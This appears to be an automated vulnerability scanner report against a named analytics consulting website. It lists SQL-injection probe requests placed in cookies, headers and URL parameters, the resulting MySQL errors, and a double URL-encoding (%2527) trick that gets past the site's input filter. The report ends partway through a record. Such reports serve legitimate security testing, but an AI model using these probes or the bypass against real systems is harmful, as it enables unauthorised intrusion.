GET /blog/webanalytics.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/consulting.html Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0'; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 1
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 06:35:21 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 Connection: close Content-Type: text/html Content-Length: 76
Database Error: Unable to connect to the database:Could not connect to MySQL
Request 2
GET /blog/webanalytics.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/consulting.html Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0''; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 2
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 06:35:22 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Connection: close Content-Type: text/html Content-Length: 326
<br /> <b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro ...[SNIP]...
The __utmmobile cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utmmobile cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /component/content/article/62-urchin/118-urchin-7-now-available.html?itemid=70#comment HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/ Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c'; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 1
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 08:19:00 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 Connection: close Content-Type: text/html Content-Length: 76
Database Error: Unable to connect to the database:Could not connect to MySQL
Request 2
GET /component/content/article/62-urchin/118-urchin-7-now-available.html?itemid=70#comment HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/ Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c''; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 2
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 08:19:01 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 08:19:03 GMT; path=/ Last-Modified: Sat, 06 Nov 2010 08:19:03 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 27263
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /component/content/article/65-ae/110-analytics-engine.html?itemid=70#comment HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)' Connection: close Referer: http://www.analyticspros.com/ Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 1
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 08:28:32 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 08:28:34 GMT; path=/ Last-Modified: Sat, 06 Nov 2010 08:28:34 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 29714
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The __utmc cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utmc cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the __utmc cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /component/content/article/65-ae/110-analytics-engine.html?itemid=70#comment HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/ Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141%2527; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 1
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 08:18:39 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 Connection: close Content-Type: text/html Content-Length: 76
Database Error: Unable to connect to the database:Could not connect to MySQL
Request 2
GET /component/content/article/65-ae/110-analytics-engine.html?itemid=70#comment HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/ Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141%2527%2527; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 2
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 08:18:40 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 08:18:43 GMT; path=/ Last-Modified: Sat, 06 Nov 2010 08:18:43 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 29558
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The __utmmobile cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utmmobile cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the __utmmobile cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /component/content/article/65-ae/110-analytics-engine.html?itemid=70#comment HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/ Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c%2527; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 1
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 08:21:51 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 08:21:52 GMT; path=/ Last-Modified: Sat, 06 Nov 2010 08:21:53 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 29714
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The itemid parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the itemid parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /component/content/article/65-ae/110-analytics-engine.html?itemid=70#comment' HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/ Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 1
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 08:13:22 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 Connection: close Content-Type: text/html Content-Length: 76
Database Error: Unable to connect to the database:Could not connect to MySQL
Request 2
GET /component/content/article/65-ae/110-analytics-engine.html?itemid=70#comment'' HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/ Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 2
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 08:13:24 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Connection: close Content-Type: text/html Content-Length: 326
<br /> <b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro ...[SNIP]...
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /component%2527/jsetup/comment/ HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 1
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 05:03:23 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 Connection: close Content-Type: text/html Content-Length: 76
Database Error: Unable to connect to the database:Could not connect to MySQL
Request 2
GET /component%2527%2527/jsetup/comment/ HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 2
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 05:03:24 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 05:03:25 GMT; path=/ Last-Modified: Sat, 06 Nov 2010 05:03:25 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 16559
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /component/jsetup/comment'/ HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 1
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 08:24:00 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 08:24:04 GMT; path=/ Last-Modified: Sat, 06 Nov 2010 08:24:04 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 16792
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the Referer HTTP header as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /component/jsetup/comment/ HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; Referer: http://www.google.com/search?hl=en&q=%2527
Response 1
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 08:20:59 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 Connection: close Content-Type: text/html Content-Length: 76
Database Error: Unable to connect to the database:Could not connect to MySQL
Request 2
GET /component/jsetup/comment/ HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; Referer: http://www.google.com/search?hl=en&q=%2527%2527
Response 2
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 08:21:01 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Connection: close Content-Type: text/html Content-Length: 326
<br /> <b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro ...[SNIP]...
The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /component/jsetup'/comment/add.html?commenttype=20&etid=51&returnid=aW5kZXgucGhwP29wdGlvbj1jb21fY29udGVudCZlaWQ9QXJyYXkmSXRlbWlkPTY0JmZvcm1hdD1odG1sJnZpZXc9YXJ0aWNsZSZpZD01MSZsYXlvdXQ9ZGVmYXVsdCZjb21tZW50dHlwZT0yMA%3D%3D&titleheader=%5B HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/index.php?option=com_jsetup&controller=comment&task=add&commenttype=20&etid=51&returnid=aW5kZXgucGhwP29wdGlvbj1jb21fY29udGVudCZlaWQ9QXJyYXkmSXRlbWlkPTY0JmZvcm1hdD1odG1sJnZpZXc9YXJ0aWNsZSZpZD01MSZsYXlvdXQ9ZGVmYXVsdCZjb21tZW50dHlwZT0yMA==&format=html&titleheader=[ Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;
Response 1
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 08:29:38 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 08:29:39 GMT; path=/ Last-Modified: Sat, 06 Nov 2010 08:29:39 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 27613
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 4, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
